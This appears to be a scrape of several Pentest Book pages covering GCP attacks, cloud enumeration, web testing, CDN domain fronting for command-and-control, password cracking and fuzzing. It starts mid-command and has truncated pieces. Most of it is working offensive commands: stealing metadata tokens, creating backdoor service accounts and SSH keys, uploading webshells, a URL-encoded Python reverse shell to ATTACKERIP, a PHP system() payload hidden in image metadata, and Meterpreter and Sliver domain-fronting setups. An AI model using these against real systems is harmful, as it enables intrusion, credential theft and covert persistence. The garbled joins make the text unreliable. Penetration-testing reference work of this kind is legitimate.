AAAAB3NzaC1yc2EAAAADAQABAAABgQDFGrK8V2k0xBeSzN+oUgnRLSIgUED7ayeUJJ10ryEFR0xJbFeGsRAL5LUzw1DTT9gRKmcMTjmZNU3E99bwyytV0fLnGVRIZ63oC8IdTESR0g8EnU6yam/ntq6gZF5QRcES3gaZlnssOQQhw0rvcCB7o5oM1zCDQtgJXAu/2UI6yKf3xdlcHdrULbKTR+0c7r2FWMLgdghGsA+yH3leHJWjDE/WJ1mqf+ZE+RvwLZ8TmVFJmI37xoKEeVnkmOrOe/TMYvtuzSQduHEUhhfjB8YPUYH7dGHyVPlRp/0Hsrjauf5//zNN9dyAZisElgF7CnJmtJVizfDxlXd/nwrVC8nf2xzbi8nc24STfTg3+lR1f73Z5xN9waPl3eHMNy7nXvShxSO01ZwwuyTmjNh83ik1PJjNU= privilegeduser privilegeduser:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDnLriKvJcwZ2eRUbYpy7ZiZrZub+ZblHgKhATPnRjEXK7Q5U3vOFutCeMavxQ82yIwne6b6LzDAfKeS6wlez1ll2npGhKpb8mAM+ZIKxdTAoAhenOlLlmMyYHhJs/UjkTtj7TZDIEa/uZjZgClK5fmgkYjprsRbPOtAru8fBAOAWfMtrXYFmUJy94iMIvYpRuUPTZ0XUkzmyETNspZOwoOd+K2yTmFor4mWIgTzbaeAtJA+b+nQmXM1Ya1RfalpQsomXnkhqihh/wmqJMDGIJT1YgepMxbj4wy5WyUlE4Ub+/Wh7Lyu51jaRJ++FYh/pgb3m3d8t7B6b2Jj7ldxicQSPu6Mc9TZ5QrPx91dOe/Mzmte2kW7AF8xXo+Se71Ffc5csupUo62uyeXt12F+qNiqHeJXSomxck7rRwonnUhyNJ2icCPogsbDNDjHvdXmGsrXNFU= privilegeduser # Upload the file with the 2 keys and access to the instance gcloud compute instances add-metadata instance-1 --metadata-from-file ssh-keys=keys.txt --zone us-central1-a ssh -i underprivuser privilegeduser@xx.xx.xx.xx # Re-authentication the account keys # Find keys in instance cd /home//.config/gcloud cat credentials.db # Copy the credentials, make a new json file inside your computer and paste it. gcloud auth activate-service-account --key-file .json # Now can access API Copy # List all service accounts in project gcloud iam service-accounts list # Get details of a service account gcloud iam service-accounts describe # List keys for a service account gcloud iam service-accounts keys list --iam-account= # Check service account permissions gcloud projects get-iam-policy --flatten="bindings[].members" --format="table(bindings.role)" --filter="bindings.members:" # Impersonate service account (if you have iam.serviceAccountTokenCreator) gcloud auth print-access-token --impersonate-service-account= # Generate service account key (if you have iam.serviceAccountKeys.create) gcloud iam service-accounts keys create key.json --iam-account= Copy # Check for overly permissive IAM policies gcloud projects get-iam-policy --format=json # Look for allUsers or allAuthenticatedUsers gcloud projects get-iam-policy --format=json | grep -E "allUsers|allAuthenticatedUsers" # Check custom roles for excessive permissions gcloud iam roles describe --project= # Dangerous permissions to look for: # - iam.serviceAccountKeys.create (can create keys for any SA) # - iam.serviceAccountTokenCreator (can impersonate any SA) # - compute.instances.setMetadata (can add SSH keys) # - storage.objects.setIamPolicy (can change bucket permissions) # - resourcemanager.projects.setIamPolicy (can give yourself any permission) Copy # Enumerate buckets # https://github.com/RhinoSecurityLabs/GCPBucketBrute python3 gcpbucketbrute.py -k keyword -u # Check bucket permissions gsutil iam get gs:// # Check if bucket is public curl https://storage.googleapis.com// # List bucket contents gsutil ls gs:// gsutil ls -r gs:///** # Download all bucket contents gsutil -m cp -r gs:// ./ # Check for sensitive files gsutil ls gs:///*.json gsutil ls gs:///*.key gsutil ls gs:///*.pem gsutil ls gs:///*password* gsutil ls gs:///*secret* gsutil ls gs:///*.env # If you have write access - upload webshell gsutil cp shell.php gs:/// # Bucket permissions abuse # If you can modify bucket IAM: gsutil iam ch allUsers:objectViewer gs:// Copy # Access metadata server (from compromised instance) curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/ # Get access token curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token # Get service account email curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email # Get all instance attributes curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?recursive=true" # Check for startup scripts (may contain secrets) curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/attributes/startup-script # Get SSH keys from metadata curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/project/attributes/ssh-keys # Get Kube-env (Kubernetes secrets) curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env Copy # List datasets bq ls # List tables in dataset bq ls # Show table schema bq show . # Query table (first 1000 rows) bq query --use_legacy_sql=false "SELECT * FROM \`project.dataset.table\` LIMIT 1000" # Export to GCS bq extract --destination_format=CSV . gs:///export.csv # Search for sensitive data bq query --use_legacy_sql=false "SELECT * FROM \`project.dataset.table\` WHERE column LIKE '%password%'" Copy # List functions gcloud functions list # Get function details including source gcloud functions describe --region= # Get function source code URL gcloud functions describe --region= --format="value(sourceArchiveUrl)" # Download source code gsutil cp gs:///.zip ./ # View function environment variables (may contain secrets) gcloud functions describe --region= --format="json" | jq '.environmentVariables' # Invoke function (if you have permission) gcloud functions call --region= --data '{"key":"value"}' # Check for public functions gcloud functions get-iam-policy --region= Copy # If you have setIamPolicy permission on a resource # Give yourself owner role on project gcloud projects add-iam-policy-binding --member=user: --role=roles/owner # If you can create service account keys gcloud iam service-accounts keys create key.json --iam-account=@.iam.gserviceaccount.com gcloud auth activate-service-account --key-file=key.json # If you can update instance metadata (add SSH key) gcloud compute instances add-metadata --metadata=ssh-keys="attacker:$(cat ~/.ssh/id_rsa.pub)" --zone= # If you have compute.instances.setServiceAccount # Change instance SA to more privileged one gcloud compute instances set-service-account --service-account=@.iam.gserviceaccount.com --zone= # If you can modify Cloud Functions # Deploy function with privileged SA gcloud functions deploy pwned --runtime=python39 --trigger-http --service-account=@.iam.gserviceaccount.com --source=. Copy # Create backdoor service account gcloud iam service-accounts create backdoor --display-name="Monitoring Service" gcloud projects add-iam-policy-binding --member=serviceAccount:backdoor@.iam.gserviceaccount.com --role=roles/editor gcloud iam service-accounts keys create backdoor-key.json --iam-account=backdoor@.iam.gserviceaccount.com # Add SSH key to project metadata (persists across all instances) gcloud compute project-info add-metadata --metadata=ssh-keys="attacker:$(cat attacker.pub)" # Deploy persistent Cloud Function gcloud functions deploy backdoor --runtime=python39 --trigger-http --allow-unauthenticated Copy # Thunder CTF - GCP exploitation CTF # https://thunder-ctf.cloud/ # GCP Goat - Vulnerable by design # https://gcpgoat.joshuajebaraj.com/ # Qwiklabs - Official GCP labs # https://www.qwiklabs.com/ Copy # https://github.com/prowler-cloud/prowler prowler gcp # check for the most important checks in terms of severity prowler gcp --severity critical high # ScoutSuite - Multi-cloud security auditing # https://github.com/nccgroup/ScoutSuite scout gcp --service-account-key-file key.json # GCPBucketBrute - Bucket enumeration # https://github.com/RhinoSecurityLabs/GCPBucketBrute python3 gcpbucketbrute.py -k --- # General | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/enumeration/cloud/general.md) . [](https://www.pentest-book.com/enumeration/cloud/general#tools) Tools --------------------------------------------------------------------------- Copy # Non provider specific and general purpose # https://github.com/nccgroup/ScoutSuite # https://github.com/SygniaLabs/security-cloud-scout # https://github.com/initstring/cloud_enum python3 cloud_enum.py -k companynameorkeyword # https://github.com/cyberark/SkyArk # https://github.com/SecurityFTW/cs-suite cd /tmp mkdir .aws cat > .aws/config < .aws/credentials <||g' > wordlist_endpoints.txt # Bypass Rate Limits: # Use different params: sign-up, Sign-up, SignUp # Null byte on params: %00, %0d%0a, %09, %0C, %20, %0 # Bypass upload restrictions: # Change extension: .pHp3 or pHp3.jpg # Modify mimetype: Content-type: image/jpeg # Bypass getimagesize(): exiftool -Comment='"; system($_GET['cmd']); ?>' file.jpg # Add gif header: GIF89a; # All at the same time. # ImageTragic (memory leaks in gif preview) # https://github.com/neex/gifoeb ./gifoeb gen 512x512 dump.gif # Upload dump.gif multiple times, check if preview changes. # Check docs for exploiting # If upload from web is allowed or : # https://medium.com/@shahjerry33/pixel-that-steals-data-im-invisible-3c938d4c3888 # https://iplogger.org/invisible/ # https://iplogger.org/15bZ87 # Check HTTP options: # Check if it is possible to upload curl -v -k -X OPTIONS https://10.11.1.111/ # If put enabled, upload: curl -v -X PUT -d '' http://10.11.1.111/test/shell.php nmap -p 80 192.168.1.124 --script http-put --script-args http-put.url='/test/rootme.php',http-put.file='/root/php-reverse-shell.php' curl -v -X PUT -d '' http://VICTIMIP/test/cmd.php && http://VICTIMIP/test/cmd.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22ATTACKERIP%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27 curl -i -X PUT -H ā€œContent-Type: text/plain; charset=utf-8ā€ -d ā€œ/root/Desktop/meterpreter.phpā€ http://VICTIMIP:8585/uploads/meterpreter.php # If PUT is not allowed, try to override: X-HTTP-Method-Override: PUT X-Method-Override: PUT # Retrieve endpoints # LinkFinder # https://github.com/GerbenJavado/LinkFinder python linkfinder.py -i https://example.com -d python linkfinder.py -i burpfile -b # Retreive hidden parameters # Tools # https://github.com/s0md3v/Arjun python3 arjun.py -u https://url.com --get python3 arjun.py -u https://url.com --post # https://github.com/maK-/parameth python parameth.py -u https://example.com/test.php # https://github.com/devanshbatham/ParamSpider python3 paramspider.py --domain example.com # https://github.com/s0md3v/Parth python3 parth.py -t example.com # .DS_Store files? # https://github.com/gehaxelt/Python-dsstore python main.py samples/.DS_Store.ctf # Polyglot RCE payload 1;sleep${IFS}9;#${IFS}’;sleep${IFS}9;#${IFS}ā€;sleep${IFS}9;#${IFS} # Nmap web scan nmap --script "http-*" example.com -p 443 # SQLi + XSS + SSTI '">{{7*7}} ' ==> for Sql injection "> ==> for XSS {{7*7}} ==> for SSTI/CSTI # Try to connect with netcat to port 80 nc -v host 80 # Understand URL params with unfurl https://dfir.blog/unfurl/ [PreviousGeneral Info](https://www.pentest-book.com/enumeration/web/general-info) [NextHeader injections](https://www.pentest-book.com/enumeration/web/header-injections) Last updated 5 years ago Was this helpful? Was this helpful? --- # CDN - Comain Fronting | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting.md) . Domain fronting uses CDN infrastructure to hide C2 traffic by making requests appear to go to legitimate domains. [](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#how-it-works) How It Works ----------------------------------------------------------------------------------------------------- Copy 1. Attacker's C2 and legitimate site share same CDN (e.g., CloudFront) 2. TLS SNI (outer) shows: legitimate-site.com 3. HTTP Host header (inner) shows: attacker-c2.com 4. CDN routes based on Host header, not SNI 5. Network monitoring sees traffic to "legitimate-site.com" [](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#finding-frontable-domains) Finding Frontable Domains ------------------------------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#automated-discovery) Automated Discovery Copy # FindFrontableDomains # https://github.com/rvrsh3ll/FindFrontableDomains python3 FindFrontableDomains.py -d target-cdn.net # Domain Fronting Tools # https://github.com/stevecoward/domain-fronting-tools python3 finder.py --cdn cloudfront # DomainFrontingLists (pre-compiled lists) # https://github.com/vysecurity/DomainFrontingLists ### [](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#manual-testing) Manual Testing [](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#cdn-specific-techniques) CDN-Specific Techniques --------------------------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#amazon-cloudfront) Amazon CloudFront ### [](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#azure-cdn) Azure CDN ### [](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#google-cloud-cdn) Google Cloud CDN ### [](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#fastly) Fastly ### [](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#cloudflare) Cloudflare [](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#tls-1.3-considerations) TLS 1.3 Considerations ------------------------------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#c2-framework-integration) C2 Framework Integration ----------------------------------------------------------------------------------------------------------------------------- ### [](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#cobalt-strike) Cobalt Strike ### [](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#sliver) Sliver ### [](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#metasploit) Metasploit [](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#detection-and-defense) Detection & Defense --------------------------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#alternatives-when-fronting-fails) Alternatives When Fronting Fails --------------------------------------------------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#tools) Tools --------------------------------------------------------------------------------------- [](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#related-topics) Related Topics --------------------------------------------------------------------------------------------------------- * [C2 Frameworks](https://www.pentest-book.com/exploitation/web-exploits) - C2 framework usage * [RT/EDR Evasion](https://www.pentest-book.com/others/rt-edr) - Evasion techniques * [SSRF](https://www.pentest-book.com/enumeration/web/ssrf) - CDN can be SSRF target [PreviousServerless Security](https://www.pentest-book.com/enumeration/cloud/serverless) [NextCloud AI Security](https://www.pentest-book.com/enumeration/cloud/cloud-ai-security) Last updated 5 months ago Was this helpful? * [How It Works](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#how-it-works) * [Finding Frontable Domains](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#finding-frontable-domains) * [Automated Discovery](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#automated-discovery) * [Manual Testing](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#manual-testing) * [CDN-Specific Techniques](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#cdn-specific-techniques) * [Amazon CloudFront](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#amazon-cloudfront) * [Azure CDN](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#azure-cdn) * [Google Cloud CDN](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#google-cloud-cdn) * [Fastly](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#fastly) * [Cloudflare](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#cloudflare) * [TLS 1.3 Considerations](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#tls-1.3-considerations) * [C2 Framework Integration](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#c2-framework-integration) * [Cobalt Strike](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#cobalt-strike) * [Sliver](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#sliver) * [Metasploit](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#metasploit) * [Detection & Defense](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#detection-and-defense) * [Alternatives When Fronting Fails](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#alternatives-when-fronting-fails) * [Tools](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#tools) * [Related Topics](https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting#related-topics) Was this helpful? Copy # Test if domain fronting works # Replace SNI with legitimate domain, Host with your domain # Using curl curl -H "Host: your-c2.cloudfront.net" https://legitimate.cloudfront.net/ # If you get response from your-c2 → Domain fronting works # Test with different CDNs for domain in $(cat frontable_domains.txt); do curl -s -H "Host: your-c2.com" "https://$domain/" | head -1 done Copy # Find CloudFront distributions dig domain.com | grep cloudfront # Test fronting curl -H "Host: attacker.cloudfront.net" https://legitimate.cloudfront.net/path # Note: AWS has restricted domain fronting as of 2018 # But some edge cases may still work Copy # Azure Front Door domains *.azurefd.net *.azureedge.net # Test curl -H "Host: attacker.azurefd.net" https://legitimate.azurefd.net/ Copy # Google has blocked domain fronting since 2018 # Alternative: Use App Engine with custom domains Copy # Fastly domains *.fastly.net *.global.ssl.fastly.net curl -H "Host: attacker.global.ssl.fastly.net" https://legitimate.global.ssl.fastly.net/ Copy # Cloudflare domains *.cloudflare.com # Note: Cloudflare has mitigations in place # Workers may be alternative approach Copy # TLS 1.3 encrypts more of the handshake # SNI is still visible unless using ECH (Encrypted Client Hello) # Noctilucent - TLS 1.3 Domain Fronting # https://github.com/SixGenInc/Noctilucent # Exploits TLS 1.3 session resumption Copy # Malleable C2 profile for domain fronting http-get { set uri "/search"; client { header "Host" "your-c2.cloudfront.net"; } } # Listener setup: # Host: legitimate.cloudfront.net # Host Header: your-c2.cloudfront.net Copy # Generate implant with domain fronting sliver > https -d legitimate.cloudfront.net -H your-c2.cloudfront.net # Or in implant config sliver > generate --http legitimate.cloudfront.net --http-header "Host:your-c2.cloudfront.net" Copy # Reverse HTTPS with domain fronting use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_https set LHOST your-c2.cloudfront.net set HttpHostHeader legitimate.cloudfront.net set OverrideRequestHost true Copy # Indicators to monitor: 1. Mismatch between SNI and Host header 2. Unusual CDN traffic patterns 3. Long-lived HTTPS sessions to CDN edges 4. POST requests to CDN (vs typical GET for static content) # Defensive measures: 1. Block known CDN IP ranges (drastic) 2. SSL/TLS inspection to compare SNI vs Host 3. Monitor for C2 framework signatures in traffic 4. Analyze CDN logs for suspicious patterns Copy # CDN as redirector # Set up CDN to proxy to your actual C2 # Serverless redirectors # Use Lambda@Edge, Cloudflare Workers to redirect # Legitimate cloud services # Use Azure Blob, S3 buckets as dead drops Copy # Domain Fronting Finder https://github.com/rvrsh3ll/FindFrontableDomains # Domain Fronting Tools https://github.com/stevecoward/domain-fronting-tools # TLS 1.3 Fronting https://github.com/SixGenInc/Noctilucent # Pre-compiled Lists https://github.com/vysecurity/DomainFrontingLists --- # Password cracking | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/others/password-cracking.md) . [](https://www.pentest-book.com/others/password-cracking#identify-hash) Identify hash ------------------------------------------------------------------------------------------ Copy # https://github.com/noraj/haiti haiti [hash] [](https://www.pentest-book.com/others/password-cracking#dictionary-creation) Dictionary creation ------------------------------------------------------------------------------------------------------ Copy # Pydictor # https://www.github.com/landgrey/pydictor.git pydictor.py -extend TERM --leet 0 1 2 11 21 --len 4 20 # Username generator # https://github.com/benbusby/namebuster namebuster https://example.com namebuster "term1, term2" https://app.wgen.io/ ### [](https://www.pentest-book.com/others/password-cracking#examples) Examples Copy # Numeric dictionary length 4 python3 pydictor.py -base d --len 4 4 # Capital letters dictionary length 4 python3 pydictor.py -base c --len 4 4 # Prepend word + digits 5 length python3 pydictor.py --len 5 5 --head raj -base d # Append word after digits 5 length python3 pydictor.py --len 5 5 --tail raj -base d # Permute chars in word python3 pydictor.py -char raj # Multiple permutations python3 pydictor.py -chunk abc ABC 666 . _ @ "'" # Dictionary based in word, added complexity 4 and fixed length python pydictor.py -extend raj --level 4 --len 1 6 # Interactive mode python3 pydictor.py --sedb ### [](https://www.pentest-book.com/others/password-cracking#options) Options [](https://www.pentest-book.com/others/password-cracking#jtr) jtr ---------------------------------------------------------------------- [](https://www.pentest-book.com/others/password-cracking#hashcat) Hashcat ------------------------------------------------------------------------------ ### [](https://www.pentest-book.com/others/password-cracking#wiki) Wiki [![Logo](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2Fhashcat.net%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=aa2baca&sv=2)hashcat \[hashcat wiki\]hashcat.net](https://hashcat.net/wiki/doku.php?id=hashcat) ### [](https://www.pentest-book.com/others/password-cracking#hashes) Hashes [![Logo](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2Fopenwall.info%2Fwiki%2Flib%2Ftpl%2Flocal%2Fimages%2Fapple-touch-icon.png&width=20&dpr=3&quality=100&sign=630f5fd6&sv=2)Sample password hash encoding strings \[Openwall Community Wiki\]openwall.info](https://openwall.info/wiki/john/sample-hashes) [![Logo](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2Fhashcat.net%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=aa2baca&sv=2)example\_hashes \[hashcat wiki\]hashcat.net](https://hashcat.net/wiki/doku.php?id=example_hashes) ### [](https://www.pentest-book.com/others/password-cracking#examples-1) Examples ### [](https://www.pentest-book.com/others/password-cracking#useful-hashes) Useful hashes #### [](https://www.pentest-book.com/others/password-cracking#linux-hashes-etc-shadow) Linux Hashes - /etc/shadow ID Description 500 md5crypt $1$, MD5(Unix) 200 bcrypt $2\*$, Blowfish(Unix) 400 sha256crypt $5$, SHA256(Unix) 1800 sha512crypt $6$, SHA512(Unix) #### [](https://www.pentest-book.com/others/password-cracking#windows-hashes) Windows Hashes ID Description 3000 LM 1000 NTLM #### [](https://www.pentest-book.com/others/password-cracking#common-hashes) Common Hashes ID Description Type 900 MD4 Raw Hash 0 MD5 Raw Hash 5100 Half MD5 Raw Hash 100 SHA1 Raw Hash 10800 SHA-384 Raw Hash 1400 SHA-256 Raw Hash 1700 SHA-512 Raw Hash #### [](https://www.pentest-book.com/others/password-cracking#common-files-with-password) Common Files with password ID Description 11600 7-Zip 12500 RAR3-hp 13000 RAR5 13200 AxCrypt 13300 AxCrypt in-memory SHA1 13600 WinZip 9700 MS Office <= 2003 $0/$1, MD5 + RC4 9710 MS Office <= 2003 $0/$1, MD5 + RC4, collider #1 9720 MS Office <= 2003 $0/$1, MD5 + RC4, collider #2 9800 MS Office <= 2003 $3/$4, SHA1 + RC4 9810 MS Office <= 2003 $3, SHA1 + RC4, collider #1 9820 MS Office <= 2003 $3, SHA1 + RC4, collider #2 9400 MS Office 2007 9500 MS Office 2010 9600 MS Office 2013 10400 PDF 1.1 - 1.3 (Acrobat 2 - 4) 10410 PDF 1.1 - 1.3 (Acrobat 2 - 4), collider #1 10420 PDF 1.1 - 1.3 (Acrobat 2 - 4), collider #2 10500 PDF 1.4 - 1.6 (Acrobat 5 - 8) 10600 PDF 1.7 Level 3 (Acrobat 9) 10700 PDF 1.7 Level 8 (Acrobat 10 - 11) 16200 Apple Secure Notes #### [](https://www.pentest-book.com/others/password-cracking#database-hashes) Database Hashes ID Description Type Example Hash 12 PostgreSQL Database Server a6343a68d964ca596d9752250d54bb8a:postgres 131 MSSQL (2000) Database Server 0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578 132 MSSQL (2005) Database Server 0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe 1731 MSSQL (2012, 2014) Database Server 0x02000102030434ea1b17802fd95ea6316bd61d2c94622ca3812793e8fb1672487b5c904a45a31b2ab4a78890d563d2fcf5663e46fe797d71550494be50cf4915d3f4d55ec375 200 MySQL323 Database Server 7196759210defdc0 300 MySQL4.1/MySQL5 Database Server fcf7c1b8749cf99d88e5f34271d636178fb5d130 3100 Oracle H: Type (Oracle 7+) Database Server 7A963A529D2E3229:3682427524 112 Oracle S: Type (Oracle 11+) Database Server ac5f1e62d21fd0529428b84d42e8955b04966703:38445748184477378130 12300 Oracle T: Type (Oracle 12+) Database Server 78281A9C0CF626BD05EFC4F41B515B61D6C4D95A250CD4A605CA0EF97168D670EBCB5673B6F5A2FB9CC4E0C0101E659C0C4E3B9B3BEDA846CD15508E88685A2334141655046766111066420254008225 8000 Sybase ASE Database Server 0xc00778168388631428230545ed2c976790af96768afa0806fe6c0da3b28f3e132137eac56f9bad027ea2 #### [](https://www.pentest-book.com/others/password-cracking#kerberos-hashes) Kerberos Hashes ID Type Example 13100 Type 23 $krb5tgs$23$ 19600 Type 17 $krb5tgs$17$ 19700 Type 18 $krb5tgs$18$ 18200 ASREP Type 23 $krb5asrep$23$ [](https://www.pentest-book.com/others/password-cracking#files) Files -------------------------------------------------------------------------- [PreviousBurp Suite](https://www.pentest-book.com/others/burp) [NextVirtualBox](https://www.pentest-book.com/others/virtualbox) Last updated 3 years ago Was this helpful? * [Identify hash](https://www.pentest-book.com/others/password-cracking#identify-hash) * [Dictionary creation](https://www.pentest-book.com/others/password-cracking#dictionary-creation) * [Examples](https://www.pentest-book.com/others/password-cracking#examples) * [Options](https://www.pentest-book.com/others/password-cracking#options) * [jtr](https://www.pentest-book.com/others/password-cracking#jtr) * [Hashcat](https://www.pentest-book.com/others/password-cracking#hashcat) * [Wiki](https://www.pentest-book.com/others/password-cracking#wiki) * [Hashes](https://www.pentest-book.com/others/password-cracking#hashes) * [Examples](https://www.pentest-book.com/others/password-cracking#examples-1) * [Useful hashes](https://www.pentest-book.com/others/password-cracking#useful-hashes) * [Files](https://www.pentest-book.com/others/password-cracking#files) Was this helpful? Copy -base dLc # Base digits, Lowercase letters and Capital letters --encode b64 # Encode output Copy john --wordlist=/usr/share/wordlists/rockyou.txt hash john --rules --wordlist=/usr/share/wordlists/rockyou.txt hash Copy # Dictionary hashcat -m 0 -a 0 hashfile dictionary.txt -O --user -o result.txt # Dictionary + rules hashcat -m 0 -w 3 -a 0 hashfile dictionary.txt -O -r haku34K.rule --user -o result.txt # Mask bruteforce (length 1-8 A-Z a-z 0-9) hashcat -m 0 -w 3 -a 3 hashfile ?1?1?1?1?1?1?1?1 --increment -1 --user ?l?d?u hashcat -m 0 -w 3 -a 3 hashfile suffix?1?1?1 -i -1 --user ?l?d # Modes -a 0 = Dictionary (also with rules) -a 3 = Bruteforce with mask # Max performance options --force -O -w 3 --opencl-device-types 1,2 # Output results -o result.txt # Ignore usernames in hashfile --user/--username # Masks ?l = abcdefghijklmnopqrstuvwxyz ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ ?d = 0123456789 ?s = Ā«spaceĀ»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~ ?a = ?l?u?d?s ?b = 0x00 - 0xff Copy https://github.com/kaonashi-passwords/Kaonashi https://github.com/NotSoSecure/password_cracking_rules https://crackstation.net/files/crackstation-human-only.txt.gz https://crackstation.net/files/crackstation.txt.gz --- # Crawl/Fuzz | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/enumeration/web/crawl-fuzz.md) . Copy # Crawlers dirhunt https://url.com/ hakrawler -domain https://url.com/ python3 sourcewolf.py -h gospider -s "https://example.com/" -o output -c 10 -d 1 gospider -S sites.txt -o output -c 10 -d 1 gospider -s "https://example.com/" -o output -c 10 -d 1 --other-source --include-subs # Fuzzers # ffuf # Discover content ffuf -recursion -mc all -ac -c -e .htm,.shtml,.php,.html,.js,.txt,.zip,.bak,.asp,.aspx,.xml -w six2dez/OneListForAll/onelistforall.txt -u https://url.com/FUZZ # Headers discover ffuf -mc all -ac -u https://hackxor.net -w six2dez/OneListForAll/onelistforall.txt -c -H "FUZZ: Hellothereheadertesting123 asd" # Ffuf - burp ffuf -replay-proxy http:127.0.0.1:8080 # Fuzzing extensions # General .htm,.shtml,.php,.html,.js,.txt,.zip,.bak,.asp,.aspx,.xml,.inc # Backups '.bak','.bac','.old','.000','.~','.01','._bak','.001','.inc','.Xxx' # kr # https://github.com/assetnote/kiterunner kr brute https://whatever.com/ -w onelistforallmicro.txt -x 100 --fail-status-codes 404 kr scan https://whatever.com/ -w routes-small.kite -A=apiroutes-210228 -x 100 --ignore-length=34 # chameleon # https://github.com/iustin24/chameleon ./chameleon -u http://testphp.vulnweb.com -a -A # Best wordlists for fuzzing: # https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content - raft-large-directories-lowercase.txt - directory-list-2.3-medium.txt - RobotsDisallowed/top10000.txt # https://github.com/assetnote/commonspeak2-wordlists/tree/master/wordswithext - # https://github.com/random-robbie/bruteforce-lists # https://github.com/google/fuzzing/tree/master/dictionaries # https://github.com/six2dez/OneListForAll # AIO: https://github.com/foospidy/payloads # Check https://wordlists.assetnote.io/ # Pro tip: set "Host: localhost" as header # Custom generated dictionary gau example.com | unfurl -u paths # Get files only sed 's#/#\n#g' paths.txt |sort -u # Other things gau example.com | unfurl -u keys gau example.com | head -n 1000 |fff -s 200 -s 404 # Hadrware devices admin panel # https://github.com/InfosecMatter/default-http-login-hunter default-http-login-hunter.sh https://10.10.0.1:443/ # Dirsearch dirsearch -r -f -u https://10.11.1.111 --extensions=htm,html,asp,aspx,txt -w six2dez/OneListForAll/onelistforall.txt --request-by-hostname -t 40 # dirb dirb http://10.11.1.111 -r -o dirb-10.11.1.111.txt # wfuzz wfuzz -c -z file,six2dez/OneListForAll/onelistforall.txt --hc 404 http://10.11.1.11/FUZZ # gobuster gobuster dir -u http://10.11.1.111 -w six2dez/OneListForAll/onelistforall.txt -s '200,204,301,302,307,403,500' -e # Cansina # https://github.com/deibit/cansina python3 cansina.py -u example.com -p PAYLOAD # Ger endpoints from JS # LinkFinder # https://github.com/GerbenJavado/LinkFinder python linkfinder.py -i https://example.com -d python linkfinder.py -i burpfile -b # JS enumeration # https://github.com/KathanP19/JSFScan.sh # Tip, if 429 add one of these headers: Client-Ip: IP X-Client-Ip: IP X-Forwarded-For: IP X-Forwarded-For: 127.0.0.1 